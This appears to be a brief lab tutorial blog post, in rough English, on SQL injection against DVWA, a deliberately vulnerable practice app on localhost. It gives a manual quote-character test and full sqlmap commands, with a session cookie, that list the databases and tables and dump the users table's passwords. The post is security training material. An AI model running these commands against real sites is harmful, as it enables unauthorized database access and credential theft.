open browser localhost/dvwa, use bwroser Mantra couse for easy
login username : admin, password : password and then create database
change dvwa scurity to medium level and submit
type 1on form and submit
to cek sql injection use caracter ' , its semple experiment, type 1' on form and submit, if error page that is vulnerbelity
run sqlmap : copy url
search information cookie on tool browser
we get cookies : ach8gv9j352sni9bdjgogrbp81
sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=medium; PHPSESSID=ach8gv9j352sni9bdjgogrbp81" --dbs
-u : Target url
--cookie : HTTP Cookie header
--dbs : Enumerate DBMS databases
# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=medium; PHPSESSID=ach8gv9j352sni9bdjgogrbp81" -D dvwa --tables
--tables : Enumerate DBMS database tables
we get 2 tables in dvwa database, to get ID and Password we must explore users table and dump the password becouse password did hashing
# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=medium; PHPSESSID=ach8gv9j352sni9bdjgogrbp81" -T users --dump
-T : DBMS database table to enumerate
--dump : Dump DBMS database table entries
oke,, we get result ID and password ussers in web dvwa....
Tidak ada komentar:
Posting Komentar